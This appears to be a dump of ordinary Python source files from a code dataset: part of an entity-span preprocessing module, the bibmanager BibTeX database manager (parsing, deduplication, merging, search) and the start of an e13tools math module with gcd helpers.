char_num += len(wd) + 1 # +1: whitespace
if len(word2char_span) < max_length:
word2char_span.extend([[0, 0]] * (max_length - len(word2char_span)))
if max_length != -1:
word2char_span = word2char_span[:max_length]
return word2char_span
def encode_plus(self, text, max_length = -1):
return {
"input_ids": self.text2word_indices(text, max_length),
"offset_mapping": self.get_word2char_span_map(text, max_length)
}
class Preprocessor:
def __init__(self, tokenizer, for_bert):
'''
if token_type == "subword", tokenizer must be set to bert encoder
"word", word tokenizer
'''
self.for_bert = for_bert
if for_bert:
self.tokenize = tokenizer.tokenize
self.get_tok2char_span_map = lambda text: tokenizer.encode_plus(text,
return_offsets_mapping = True,
add_special_tokens = False)["offset_mapping"]
else:
self.tokenize = tokenizer.tokenize
self.get_tok2char_span_map = lambda text: tokenizer.get_word2char_span_map(text)
def clean_data_wo_span(self, ori_data, separate = False, data_type = "train"):
'''
rm duplicate whitespaces
and separate special characters from tokens
'''
def clean_text(text):
            text = re.sub(r"\s+", " ", text).strip()
            if separate:
                text = re.sub("([^A-Za-z0-9])", r" \1 ", text)
                text = re.sub(r"\s+", " ", text).strip()
return text
for sample in tqdm(ori_data, desc = "clean data wo span"):
sample["text"] = clean_text(sample["text"])
if data_type == "test":
continue
for ent in sample["entity_list"]:
ent["text"] = clean_text(ent["text"])
return ori_data
def clean_data_w_span(self, ori_data):
'''
add a stake to bad samples and remove them from the clean data
'''
def strip_white(entity, entity_char_span):
p = 0
while entity[p] == " ":
entity_char_span[0] += 1
p += 1
p = len(entity) - 1
while entity[p] == " ":
entity_char_span[1] -= 1
p -= 1
return entity.strip(), entity_char_span
bad_samples, clean_data = [], []
for sample in tqdm(ori_data, desc = "clean data w span"):
text = sample["text"]
bad = False
for ent in sample["entity_list"]:
# rm whitespaces
ent["text"], ent["char_span"] = strip_white(ent["text"], ent["char_span"])
char_span = ent["char_span"]
if ent["text"] not in text or ent["text"] != text[char_span[0]:char_span[1]]:
ent["stake"] = 0
bad = True
if bad:
bad_samples.append(copy.deepcopy(sample))
new_ent_list = [ent for ent in sample["entity_list"] if "stake" not in ent]
if len(new_ent_list) > 0:
sample["entity_list"] = new_ent_list
clean_data.append(sample)
return clean_data, bad_samples
def _get_char2tok_span(self, text):
'''
map character level span to token level span
'''
tok2char_span = self.get_tok2char_span_map(text)
# get the number of characters
char_num = None
for tok_ind in range(len(tok2char_span) - 1, -1, -1):
if tok2char_span[tok_ind][1] != 0:
char_num = tok2char_span[tok_ind][1]
break
# build a map: char index to token level span
        char2tok_span = [[-1, -1] for _ in range(char_num)] # every character except whitespace has a corresponding token
for tok_ind, char_sp in enumerate(tok2char_span):
for char_ind in range(char_sp[0], char_sp[1]):
tok_sp = char2tok_span[char_ind]
                # char-to-token mapping can also be one-to-many (e.g. Korean), so the span's pos1 uses the first tok_ind and pos2 the last tok_ind
if tok_sp[0] == -1:
tok_sp[0] = tok_ind
tok_sp[1] = tok_ind + 1
return char2tok_span
def _get_ent2char_spans(self, text, entities, ignore_subword = True):
'''
map entity to all possible character spans
e.g. {"entity1": [[0, 1], [18, 19]]}
if ignore_subword, look for entities with whitespace around, e.g. "entity" -> " entity "
'''
entities = sorted(entities, key = lambda x: len(x), reverse = True)
text_cp = " {} ".format(text) if ignore_subword else text
ent2char_spans = {}
for ent in entities:
spans = []
target_ent = " {} ".format(ent) if ignore_subword else ent
for m in re.finditer(re.escape(target_ent), text_cp):
span = [m.span()[0], m.span()[1] - 2] if ignore_subword else m.span()
spans.append(span)
# if len(spans) == 0:
# set_trace()
ent2char_spans[ent] = spans
return ent2char_spans
def add_char_span(self, dataset, ignore_subword = True):
samples_w_wrong_entity = [] # samples with entities that do not exist in the text, please check if any
for sample in tqdm(dataset, desc = "Adding char level spans"):
entities = [ent["text"] for ent in sample["entity_list"]]
ent2char_spans = self._get_ent2char_spans(sample["text"], entities, ignore_subword = ignore_subword)
# filter
ent_memory_set = set()
uni_entity_list = []
for ent in sample["entity_list"]:
ent_memory = "{}-{}".format(ent["text"], ent["type"])
if ent_memory not in ent_memory_set:
uni_entity_list.append(ent)
ent_memory_set.add(ent_memory)
new_ent_list = []
for ent in uni_entity_list:
ent_spans = ent2char_spans[ent["text"]]
for sp in ent_spans:
new_ent_list.append({
"text": ent["text"],
"type": ent["type"],
"char_span": sp,
})
if len(sample["entity_list"]) > len(new_ent_list):
samples_w_wrong_entity.append(sample)
sample["entity_list"] = new_ent_list
return dataset, samples_w_wrong_entity
def add_tok_span(self, data):
'''
data: char span is required
'''
for sample in tqdm(data, desc = "Adding token level span"):
text = sample["text"]
char2tok_span = self._get_char2tok_span(sample["text"])
for ent in sample["entity_list"]:
char_span = ent["char_span"]
tok_span_list = char2tok_span[char_span[0]:char_span[1]]
tok_span = [tok_span_list[0][0], tok_span_list[-1][1]]
ent["tok_span"] = tok_span
return data
def check_tok_span(self, data):
entities_to_fix = []
for sample in tqdm(data, desc = "check tok spans"):
text = sample["text"]
tok2char_span = self.get_tok2char_span_map(text)
for ent in sample["entity_list"]:
tok_span = ent["tok_span"]
char_span_list = tok2char_span[tok_span[0]:tok_span[1]]
char_span = [char_span_list[0][0], char_span_list[-1][1]]
text_extr = text[char_span[0]:char_span[1]]
gold_char_span = ent["char_span"]
if not(char_span[0] == gold_char_span[0] and char_span[1] == gold_char_span[1] and text_extr == ent["text"]):
bad_ent = copy.deepcopy(ent)
bad_ent["extr_text"] = text_extr
entities_to_fix.append(bad_ent)
span_error_memory = set()
for ent in entities_to_fix:
err_mem = "gold: {} --- extr: {}".format(ent["text"], ent["extr_text"])
span_error_memory.add(err_mem)
return span_error_memory
def split_into_short_samples(self,
sample_list,
max_seq_len,
sliding_len = 50,
data_type = "train"):
new_sample_list = []
for sample in tqdm(sample_list, desc = "Splitting"):
medline_id = sample["id"]
text = sample["text"]
tokens = self.tokenize(text)
tok2char_span = self.get_tok2char_span_map(text)
# sliding on token level
for start_ind in range(0, len(tokens), sliding_len):
if self.for_bert: # if use bert, do not split a word into two samples
while "##" in tokens[start_ind]:
start_ind -= 1
end_ind = start_ind + max_seq_len
tok_spans = tok2char_span[start_ind:end_ind]
char_span = (tok_spans[0][0], tok_spans[-1][-1])
sub_text = text[char_span[0]:char_span[1]]
if data_type == "test":
if len(sub_text) > 0:
new_sample = {
"id": medline_id,
"text": sub_text,
"tok_offset": start_ind,
"char_offset": char_span[0],
}
new_sample_list.append(new_sample)
else:
sub_entity_list = []
for term in sample["entity_list"]:
tok_span = term["tok_span"]
if tok_span[0] >= start_ind and tok_span[1] <= end_ind:
new_term = copy.deepcopy(term)
new_term["tok_span"] = [tok_span[0] - start_ind, tok_span[1] - start_ind]
new_term["char_span"][0] -= char_span[0]
new_term["char_span"][1] -= char_span[0]
sub_entity_list.append(new_term)
# if len(sub_entity_list) > 0:
new_sample = {
"id": medline_id,
"text": sub_text,
"entity_list": sub_entity_list,
}
new_sample_list.append(new_sample)
if end_ind > len(tokens):
break
return new_sample_list
``` |
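A minimal sketch of how the span utilities above fit together, using the whitespace `WordTokenizer`; the sample text and entity are invented for illustration:
```python
tokenizer = WordTokenizer()
preprocessor = Preprocessor(tokenizer, for_bert=False)

sample = {
    "text": "Aspirin reduces fever",
    "entity_list": [{"text": "Aspirin", "type": "Chemical"}],
}

# add_char_span() locates character-level spans, add_tok_span() converts them to token-level spans.
data, bad_samples = preprocessor.add_char_span([sample])
data = preprocessor.add_tok_span(data)
print(data[0]["entity_list"])
# [{'text': 'Aspirin', 'type': 'Chemical', 'char_span': [0, 7], 'tok_span': [0, 1]}]
```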
{
"source": "1313e/bibmanager",
"score": 2
} |
#### File: bibmanager/bib_manager/bib_manager.py
```python
__all__ = [
'Bib',
'display_bibs',
'remove_duplicates',
'filter_field',
'loadfile',
'save',
'load',
'export',
'merge',
'init',
'add_entries',
'edit',
'search',
]
import os
import sys
import shutil
import datetime
import re
import pickle
import urllib
import subprocess
import numpy as np
import prompt_toolkit
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import print_formatted_text
import pygments
from pygments.token import Token
from pygments.lexers.bibtex import BibTeXLexer
from .. import config_manager as cm
from .. import utils as u
# Some constant definitions:
lexer = prompt_toolkit.lexers.PygmentsLexer(BibTeXLexer)
months = {"jan":1, "feb":2, "mar":3, "apr": 4, "may": 5, "jun":6,
"jul":7, "aug":8, "sep":9, "oct":10, "nov":11, "dec":12}
class Bib(object):
"""
Bibliographic-entry object.
"""
def __init__(self, entry):
"""
Create a Bib() object from given entry. Minimally, entries must
contain the author, title, and year keys.
Parameters
----------
entry: String
A bibliographic entry text.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> from bibmanager.utils import Author
>>> entry = '''@Misc{JonesEtal2001scipy,
author = {<NAME> and <NAME> and <NAME>},
title = {{SciPy}: Open source scientific tools for {Python}},
year = {2001},
}'''
>>> bib = bm.Bib(entry)
>>> print(bib.title)
SciPy: Open source scientific tools for Python
>>> for author in bib.authors:
>>> print(author)
Author(last='Jones', first='Eric', von='', jr='')
Author(last='Oliphant', first='Travis', von='', jr='')
Author(last='Peterson', first='Pearu', von='', jr='')
>>> print(bib.sort_author)
Sort_author(last='jones', first='e', von='', jr='', year=2001, month=13)
"""
if u.count(entry) != 0:
raise ValueError("Mismatched braces in entry.")
self.content = entry
# Defaults:
self.month = 13
self.adsurl = None
self.bibcode = None
self.doi = None
self.eprint = None
self.isbn = None
fields = u.get_fields(self.content)
self.key = next(fields)
for key, value, nested in fields:
if key == "title":
# Title with no braces, tabs, nor linebreak and corrected blanks:
self.title = " ".join(re.sub("({|})", "", value).split())
elif key == "author":
# Parse authors finding all non-brace-nested 'and' instances:
authors, nests = u.cond_split(value.replace("\n"," "), " and ",
nested=nested, ret_nests=True)
self.authors = [u.parse_name(author, nested)
for author,nested in zip(authors,nests)]
elif key == "year":
r = re.search('[0-9]{4}', value)
self.year = int(r.group(0))
elif key == "month":
value = value.lower().strip()
self.month = months[value[0:3]]
elif key == "doi":
self.doi = value
elif key == "adsurl":
self.adsurl = value
                # Get bibcode from adsurl, URL-decode the UTF-8 characters, and remove backslashes:
bibcode = os.path.split(value)[1].replace('\\', '')
self.bibcode = urllib.parse.unquote(bibcode)
elif key == "eprint":
self.eprint = value.replace('arXiv:','').replace('astro-ph/','')
elif key == "isbn":
self.isbn = value.lower().strip()
for attr in ['authors', 'title', 'year']:
if not hasattr(self, attr):
raise ValueError(f"Bibtex entry '{self.key}' is missing author, "
"title, or year.")
# First-author fields used for sorting:
# Note this differs from Author[0], since fields are 'purified',
# and 'first' goes only by initials().
self.sort_author = u.Sort_author(u.purify(self.authors[0].last),
u.initials(self.authors[0].first),
u.purify(self.authors[0].von),
u.purify(self.authors[0].jr),
self.year,
self.month)
def update_key(self, new_key):
"""Update key with new_key, making sure to also update content."""
self.content = self.content.replace(self.key, new_key, 1)
self.key = new_key
def __repr__(self):
return self.content
def __contains__(self, author):
r"""
Check if given author is in the author list of this bib entry.
If the 'author' string begins with the '^' character, match
only against the first author.
Parameters
----------
author: String
An author name in a valid BibTeX format.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> bib = bm.Bib('''@ARTICLE{DoeEtal2020,
author = {{<NAME>. and {<NAME>. and {Dupont}, J.},
title = "What Have the Astromomers ever Done for Us?",
journal = {\apj},
year = 2020,}''')
>>> # Check for first author:
>>> '<NAME>' in bib
True
>>> # Format doesn't matter, as long as it is a valid format:
>>> '<NAME>' in bib
True
        >>> # Omitting the first-name initials still matches:
        >>> 'Doe' in bib
        True
        >>> # But non-matching initials won't match:
>>> '<NAME>.' in bib
False
>>> # Match against first author only if string begins with '^':
>>> '^Doe' in bib
True
>>> '^Perez' in bib
False
"""
# Check first-author mark:
if author[0:1] == '^':
author = author[1:]
authors = [self.authors[0]]
else:
authors = self.authors
# Parse and purify input author name:
author = u.parse_name(author)
first = u.initials(author.first)
von = u.purify(author.von)
last = u.purify(author.last)
jr = u.purify(author.jr)
# Remove non-matching authors by each non-empty field:
if len(jr) > 0:
authors = [author for author in authors if jr == u.purify(author.jr)]
if len(von) > 0:
authors = [author for author in authors
if von == u.purify(author.von)]
if len(first) > 0:
authors = [author for author in authors
if first == u.initials(author.first)[0:len(first)]]
authors = [author for author in authors if last == u.purify(author.last)]
return len(authors) >= 1
# https://docs.python.org/3.6/library/stdtypes.html
def __lt__(self, other):
"""
Evaluate sequentially according to sort_author's fields: last,
        first, von, jr, year, and month. If any of these
        fields are equal, go on to the next field to compare.
"""
s, o = self.sort_author, other.sort_author
if s.last != o.last:
return s.last < o.last
if len(s.first)==1 or len(o.first) == 1:
if s.first[0:1] != o.first[0:1]:
return s.first < o.first
else:
if s.first != o.first:
return s.first < o.first
if s.von != o.von:
return s.von < o.von
if s.jr != o.jr:
return s.jr < o.jr
if s.year != o.year:
return s.year < o.year
return s.month < o.month
def __eq__(self, other):
"""
Check whether self and other have same sort_author (first author)
and year/month.
        Evaluate to equal by first initial if one entry has fewer initials
than the other.
"""
if len(self.sort_author.first)==1 or len(other.sort_author.first)==1:
first = self.sort_author.first[0:1] == other.sort_author.first[0:1]
else:
first = self.sort_author.first == other.sort_author.first
return (self.sort_author.last == other.sort_author.last
and first
and self.sort_author.von == other.sort_author.von
and self.sort_author.jr == other.sort_author.jr
and self.sort_author.year == other.sort_author.year
and self.sort_author.month == other.sort_author.month)
def __le__(self, other):
return self.__lt__(other) or self.__eq__(other)
def published(self):
"""
Published status according to the ADS bibcode field:
Return -1 if bibcode is None.
Return 0 if bibcode is arXiv.
Return 1 if bibcode is peer-reviewed journal.
"""
if self.bibcode is None:
return -1
return int(self.bibcode.find('arXiv') < 0)
def get_authors(self, short=True):
"""
        Wrapper for the string representation of the author list.
See bib_manager.get_authors() for docstring.
"""
return u.get_authors(self.authors, short)
def display_bibs(labels, bibs):
r"""
Display a list of bib entries on screen with flying colors.
Parameters
----------
labels: List of Strings
Header labels to show above each Bib() entry.
bibs: List of Bib() objects
BibTeX entries to display.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> e1 = '''@Misc{JonesEtal2001scipy,
author = {<NAME> and <NAME> and <NAME>},
title = {{SciPy}: Open source scientific tools for {Python}},
year = {2001},
}'''
>>> e2 = '''@Misc{Jones2001,
author = {<NAME> and <NAME> and <NAME>},
title = {SciPy: Open source scientific tools for Python},
year = {2001},
}'''
>>> bibs = [bm.Bib(e1), bm.Bib(e2)]
>>> bm.display_bibs(["DATABASE:\n", "NEW:\n"], bibs)
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
DATABASE:
@Misc{JonesEtal2001scipy,
author = {<NAME> and <NAME> and <NAME>},
title = {{SciPy}: Open source scientific tools for {Python}},
year = {2001},
}
NEW:
@Misc{Jones2001,
author = {<NAME> and <NAME> and <NAME>},
title = {SciPy: Open source scientific tools for Python},
year = {2001},
}
"""
style = prompt_toolkit.styles.style_from_pygments_cls(
pygments.styles.get_style_by_name(cm.get('style')))
if labels is None:
labels = ["" for _ in bibs]
tokens = [(Token.Comment, u.BANNER)]
for label,bib in zip(labels, bibs):
tokens += [(Token.Text, label)]
tokens += list(pygments.lex(bib.content, lexer=BibTeXLexer()))
tokens += [(Token.Text, "\n")]
print_formatted_text(PygmentsTokens(tokens), end="", style=style)
def remove_duplicates(bibs, field):
"""
    Look for duplicates (within the same list of entries) by field and
remove them (in place).
Parameters
----------
bibs: List of Bib() objects
Entries to filter.
field: String
Field to use for filtering ('doi', 'isbn', 'bibcode', or 'eprint').
"""
fieldlist = [getattr(bib,field) if getattr(bib,field) is not None else ""
for bib in bibs]
# No entries:
if len(fieldlist) == 0:
return
ubib, uinv, counts = np.unique(fieldlist, return_inverse=True,
return_counts=True)
multis = np.where((counts > 1) & (ubib != ""))[0]
# No duplicates:
if len(multis) == 0:
return
removes = []
for m in multis:
all_indices = np.where(uinv == m)[0]
entries = [bibs[i].content for i in all_indices]
# Remove identical entries:
uentries, uidx = np.unique(entries, return_index=True)
indices = list(all_indices[uidx])
removes += [idx for idx in all_indices if idx not in indices]
nbibs = len(uentries)
if nbibs == 1:
continue
# Pick peer-reviewed over ArXiv over non-ADS:
pubs = [bibs[i].published() for i in indices]
pubmax = np.amax(pubs)
removes += [idx for idx,pub in zip(indices,pubs) if pub < pubmax]
indices = [idx for idx,pub in zip(indices,pubs) if pub == pubmax]
nbibs = len(indices)
if nbibs == 1:
continue
        # Query the user:
labels = [idx + " ENTRY:\n" for idx in u.ordinal(np.arange(nbibs)+1)]
display_bibs(labels, [bibs[i] for i in indices])
s = u.req_input(f"Duplicate {field} field, []keep first, [2]second, "
"[3]third, etc.: ", options=[""]+list(np.arange(nbibs)+1))
if s == "":
indices.pop(0)
else:
indices.pop(int(s)-1)
removes += indices
for idx in reversed(sorted(removes)):
bibs.pop(idx)
def filter_field(bibs, new, field, take):
"""
Filter duplicate entries by field between new and bibs.
This routine modifies new removing the duplicates, and may modify
bibs (depending on take argument).
Parameters
----------
bibs: List of Bib() objects
Database entries.
new: List of Bib() objects
New entries to add.
field: String
Field to use for filtering.
take: String
Decision-making protocol to resolve conflicts when there are
partially duplicated entries.
'old': Take the database entry over new.
'new': Take the new entry over the database.
'ask': Ask user to decide (interactively).
"""
fields = [getattr(e,field) for e in bibs]
removes = []
for i,e in enumerate(new):
if getattr(e,field) is None or getattr(e,field) not in fields:
continue
idx = fields.index(getattr(e,field))
# Replace if duplicate and new has newer bibcode:
if e.published() > bibs[idx].published() or take=='new':
bibs[idx] = e
# Look for different-key conflict:
if e.key != bibs[idx].key and take == "ask":
display_bibs(["DATABASE:\n", "NEW:\n"], [bibs[idx], e])
s = u.req_input(f"Duplicate {field} field but different keys, []keep "
"database or take [n]ew: ", options=["", "n"])
if s == "n":
bibs[idx] = e
removes.append(i)
for idx in reversed(sorted(removes)):
new.pop(idx)
def loadfile(bibfile=None, text=None):
"""
Create a list of Bib() objects from a BibTeX file (.bib file).
Parameters
----------
bibfile: String
Path to an existing .bib file.
text: String
Content of a .bib file (ignored if bibfile is not None).
Returns
-------
bibs: List of Bib() objects
List of Bib() objects of BibTeX entries in bibfile, sorted by
Sort_author() fields.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> import os
>>> bibfile = os.path.expanduser("~") + "/.bibmanager/examples/sample.bib"
>>> bibs = bm.loadfile(bibfile)
"""
entries = [] # Store Lists of bibtex entries
entry = [] # Store lines in the bibtex
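    # parcount keeps a running balance of braces; an entry is complete when it returns to zero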
parcount = 0
# Load a bib file:
if bibfile is not None:
f = open(bibfile, 'r')
elif text is not None:
f = text.splitlines()
else:
raise TypeError("Missing input arguments for loadfile(), at least "
"bibfile or text must be provided.")
for i,line in enumerate(f):
# New entry:
if line.startswith("@") and parcount != 0:
raise ValueError(f"Mismatched braces in line {i}:\n'{line.rstrip()}'")
parcount += u.count(line)
if parcount == 0 and entry == []:
continue
if parcount < 0:
raise ValueError(f"Mismatched braces in line {i}:\n'{line.rstrip()}'")
entry.append(line.rstrip())
if parcount == 0 and entry != []:
entries.append("\n".join(entry))
entry = []
if bibfile is not None:
f.close()
if parcount != 0:
raise ValueError("Invalid input, mistmatched braces at end of file.")
bibs = [Bib(entry) for entry in entries]
remove_duplicates(bibs, "doi")
remove_duplicates(bibs, "isbn")
remove_duplicates(bibs, "bibcode")
remove_duplicates(bibs, "eprint")
return sorted(bibs)
def save(entries):
"""
Save list of Bib() entries into bibmanager pickle database.
Parameters
----------
entries: List of Bib() objects
bib files to store.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> # TBD: Load some entries
>>> bm.save(entries)
"""
# FINDME: Don't pickle-save the Bib() objects directly, but store them
# as dict objects. (More standard / backward compatibility)
with open(u.BM_DATABASE, 'wb') as handle:
pickle.dump(entries, handle, protocol=pickle.HIGHEST_PROTOCOL)
def load():
"""
Load the bibmanager database of BibTeX entries.
Returns
-------
List of Bib() entries. Return an empty list if there is no database
file.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> bibs = bm.load()
"""
try:
with open(u.BM_DATABASE, 'rb') as handle:
return pickle.load(handle)
except:
# TBD: I think I'm not defaulting to this case anymore, I should
# let it break if the input file does not exist
return []
def export(entries, bibfile=u.BM_BIBFILE):
"""
Export list of Bib() entries into a .bib file.
Parameters
----------
entries: List of Bib() objects
Entries to export.
bibfile: String
Output .bib file name.
"""
# Header for identification purposes:
header = ['This file was created by bibmanager\n',
'https://pcubillos.github.io/bibmanager/\n\n']
# Care not to overwrite user's bib files:
if os.path.exists(bibfile):
with open(bibfile, 'r') as f:
head = f.readline()
if head.strip() != header[0].strip():
path, bfile = os.path.split(os.path.realpath(bibfile))
shutil.copy(bibfile, "".join([path, '/orig_',
str(datetime.date.today()), '_', bfile]))
with open(bibfile, 'w') as f:
f.writelines(header)
for e in entries:
f.write(e.content)
f.write("\n\n")
def merge(bibfile=None, new=None, take="old", base=None):
"""
Merge entries from a new bibfile into the bibmanager database
(or into an input database).
Parameters
----------
bibfile: String
New .bib file to merge into the bibmanager database.
new: List of Bib() objects
List of new BibTeX entries (ignored if bibfile is not None).
take: String
Decision-making protocol to resolve conflicts when there are
partially duplicated entries.
'old': Take the database entry over new.
'new': Take the new entry over the database.
'ask': Ask user to decide (interactively).
base: List of Bib() objects
If None, merge new entries into the bibmanager database.
        If not None, merge new entries into base.
Returns
-------
bibs: List of Bib() objects
Merged list of BibTeX entries.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> import os
>>> # TBD: Need to add sample2.bib into package.
>>> newbib = os.path.expanduser("~") + "/.bibmanager/examples/sample2.bib"
>>> # Merge newbib into database:
>>> bm.merge(newbib, take='old')
"""
if base is None:
bibs = load()
else:
bibs = base
if bibfile is not None:
new = loadfile(bibfile)
if new is None:
return
# Filter duplicates by field:
filter_field(bibs, new, "doi", take)
filter_field(bibs, new, "isbn", take)
filter_field(bibs, new, "bibcode", take)
filter_field(bibs, new, "eprint", take)
# Filter duplicate key:
keep = np.zeros(len(new), bool)
bm_keys = [e.key for e in bibs]
for i,e in enumerate(new):
if e.key not in bm_keys:
keep[i] = True
continue
idx = bm_keys.index(e.key)
if e.content == bibs[idx].content:
continue # Duplicate, do not take
else:
display_bibs(["DATABASE:\n", "NEW:\n"], [bibs[idx], e])
s = input("Duplicate key but content differ, []ignore new, "
"take [n]ew, or\nrename key of new entry: ")
if s == "n":
bibs[idx] = e
elif s != "":
                new[i].update_key(s)
keep[i] = True
new = [e for e,keeper in zip(new,keep) if keeper]
# Different key, same title:
keep = np.zeros(len(new), bool)
bm_titles = [e.title for e in bibs]
for i,e in enumerate(new):
if e.title not in bm_titles:
keep[i] = True
continue
idx = bm_titles.index(e.title)
display_bibs(["DATABASE:\n", "NEW:\n"], [bibs[idx], e])
s = u.req_input("Possible duplicate, same title but keys differ, "
"[]ignore new, [r]eplace database with new, "
"or [a]dd new: ", options=["", "r", "a"])
if s == "r":
bibs[idx] = e
elif s == "a":
keep[i] = True
new = [e for e,keeper in zip(new,keep) if keeper]
# Add all new entries and sort:
bibs = sorted(bibs + new)
print(f"\nMerged {len(new)} new entries.")
if base is None:
save(bibs)
export(bibs)
return bibs
def init(bibfile=u.BM_BIBFILE, reset_db=True, reset_config=False):
"""
Initialize bibmanager, reset database entries and config parameters.
Parameters
----------
bibfile: String
A bibfile to include as the new bibmanager database.
If None, reset the bibmanager database with a clean slate.
reset_db: Bool
If True, reset the bibmanager database.
reset_config: Bool
If True, reset the config file.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> import os
>>> bibfile = os.path.expanduser("~") + "/.bibmanager/examples/sample.bib"
>>> bm.init(bibfile)
"""
# First install ever:
if not os.path.exists(u.HOME):
os.mkdir(u.HOME)
# Copy examples folder:
shutil.rmtree(u.HOME+'examples/', True)
shutil.copytree(u.ROOT+'examples/', u.HOME+'examples/')
# Make sure config exists before working with the database:
if reset_config:
shutil.copy(u.ROOT+'config', u.HOME+'config')
else:
cm.update_keys()
if reset_db:
if bibfile is None:
with u.ignored(OSError):
os.remove(u.BM_DATABASE)
os.remove(u.BM_BIBFILE)
else:
bibs = loadfile(bibfile)
save(bibs)
export(bibs)
def add_entries(take='ask'):
"""
Manually add BibTeX entries through the prompt.
Parameters
----------
take: String
Decision-making protocol to resolve conflicts when there are
partially duplicated entries.
'old': Take the database entry over new.
'new': Take the new entry over the database.
'ask': Ask user to decide (interactively).
"""
style = prompt_toolkit.styles.style_from_pygments_cls(
pygments.styles.get_style_by_name(cm.get('style')))
newbibs = prompt_toolkit.prompt(
"Enter a BibTeX entry (press META+ENTER or ESCAPE ENTER when done):\n",
multiline=True, lexer=lexer, style=style)
new = loadfile(text=newbibs)
if len(new) == 0:
print("No new entries to add.")
return
merge(new=new, take=take)
def edit():
"""
Manually edit the bibfile database in text editor.
Resources
---------
https://stackoverflow.com/questions/17317219/
https://docs.python.org/3.6/library/subprocess.html
"""
export(load(), u.BM_TMP_BIB)
# Open database.bib into temporary file with default text editor
if sys.platform == "win32":
os.startfile(u.BM_TMP_BIB)
else:
opener = cm.get('text_editor')
if opener == 'default':
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, u.BM_TMP_BIB])
# Launch input() call to wait for user to save edits:
dummy = input("Press ENTER to continue after you edit, save, and close "
"the bib file.")
# Check edits:
try:
new = loadfile(u.BM_TMP_BIB)
finally:
# Always delete the tmp file:
os.remove(u.BM_TMP_BIB)
# Update database if everything went fine:
save(new)
export(new)
def search(authors=None, year=None, title=None, key=None, bibcode=None):
"""
Search in bibmanager database by authors, year, or title keywords.
Parameters
----------
authors: String or List of strings
An author name (or list of names) with BibTeX format (see parse_name()
docstring). To restrict search to a first author, prepend the
'^' character to a name.
year: Integer or two-element integer tuple
If integer, match against year; if tuple, minimum and maximum
        matching years (inclusive).
title: String or iterable (list, tuple, or ndarray of strings)
Match entries that contain all input strings in the title (ignore case).
key: String or list of strings
Match any entry whose key is in the input key.
bibcode: String or list of strings
Match any entry whose bibcode is in the input bibcode.
Returns
-------
matches: List of Bib() objects
Entries that match all input criteria.
Examples
--------
>>> import bibmanager.bib_manager as bm
>>> # Search by last name:
>>> matches = bm.search(authors="Cubillos")
>>> # Search by last name and initial:
>>> matches = bm.search(authors="<NAME>")
>>> # Search by author in given year:
>>> matches = bm.search(authors="<NAME>", year=2017)
>>> # Search by first author and co-author (using AND logic):
>>> matches = bm.search(authors=["^Cubillos", "Blecic"])
>>> # Search by keyword in title:
>>> matches = bm.search(title="Spitzer")
>>> # Search by keywords in title (using AND logic):
>>> matches = bm.search(title=["HD 189", "HD 209"])
>>> # Search by key (note that unlike the other fields, key and
>>> # bibcode use OR logic, so you can get many items at once):
>>> matches = bm.search(key="Astropycollab2013aaAstropy")
>>> # Search by bibcode (note no need to worry about UTF-8 encoding):
>>> matches = bm.search(bibcode=["2013A%26A...558A..33A",
>>> "1957RvMP...29..547B",
>>> "2017AJ....153....3C"])
"""
matches = load()
if year is not None:
try: # Assume year = [from_year, to_year]
matches = [bib for bib in matches if bib.year >= year[0]]
matches = [bib for bib in matches if bib.year <= year[1]]
except:
matches = [bib for bib in matches if bib.year == year]
if authors is not None:
if isinstance(authors, str):
authors = [authors]
elif not isinstance(authors, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'authors'.")
for author in authors:
matches = [bib for bib in matches if author in bib]
if title is not None:
if isinstance(title, str):
title = [title]
elif not isinstance(title, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'title'.")
for word in title:
matches = [bib for bib in matches
if word.lower() in bib.title.lower()]
if key is not None:
if isinstance(key, str):
key = [key]
elif not isinstance(key, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'key'.")
matches = [bib for bib in matches if bib.key in key]
if bibcode is not None:
if isinstance(bibcode, str):
bibcode = [bibcode]
elif not isinstance(bibcode, (list, tuple, np.ndarray)):
raise ValueError("Invalid input format for 'bibcode'.")
# Take care of encoding:
bibcode = [urllib.parse.unquote(b) for b in bibcode]
matches = [bib for bib in matches if bib.bibcode in bibcode]
return matches
``` |
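A short usage sketch of the `Bib()` ordering defined above; the two entries are made up and it assumes the package is installed as `bibmanager`:
```python
import bibmanager.bib_manager as bm

e1 = bm.Bib('''@Misc{Adams2019,
    author = {{Adams}, D.},
    title = {Mostly Harmless Statistics},
    year = {2019},
}''')
e2 = bm.Bib('''@Misc{Zhang2015,
    author = {{Zhang}, W.},
    title = {A Study of Something},
    year = {2015},
}''')

# sorted() relies on Bib.__lt__, which compares last name, initials, von, jr, year, and month.
print([bib.key for bib in sorted([e2, e1])])
# ['Adams2019', 'Zhang2015']
```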
{
"source": "1313e/e13Tools",
"score": 4
} |
#### File: e13Tools/e13tools/math.py
```python
from functools import reduce
from math import factorial
# Package imports
import numpy as np
from numpy.linalg import cholesky, eigvals, LinAlgError, norm, svd
# e13Tools imports
from e13tools.core import ShapeError
from e13tools.numpy import transposeC
# All declaration
__all__ = ['gcd', 'is_PD', 'lcm', 'nCr', 'nearest_PD', 'nPr']
# %% FUNCTIONS
# This function calculates the greatest common divisor of a sequence
def gcd(*args):
"""
Returns the greatest common divisor of the provided sequence of integers.
Parameters
----------
args : tuple of int
Integers to calculate the greatest common divisor for.
Returns
-------
gcd : int
Greatest common divisor of input integers.
Example
-------
>>> gcd(18, 60, 72, 138)
6
See also
--------
:func:`~lcm`
Least common multiple for sequence of integers.
"""
return(reduce(gcd_single, args))
# This function calculates the greatest common divisor of two integers
def gcd_single(a, b):
"""
Returns the greatest common divisor of the integers `a` and `b` using
Euclid's Algorithm [1]_.
Parameters
----------
a, b : int
The two integers to calculate the greatest common divisor for.
Returns
-------
gcd : int
Greatest common divisor of `a` and `b`.
Notes
-----
The calculation of the greatest common divisor uses Euclid's Algorithm [1]_
with Lamé's improvements.
References
----------
.. [1] https://en.wikipedia.org/wiki/Euclidean_algorithm
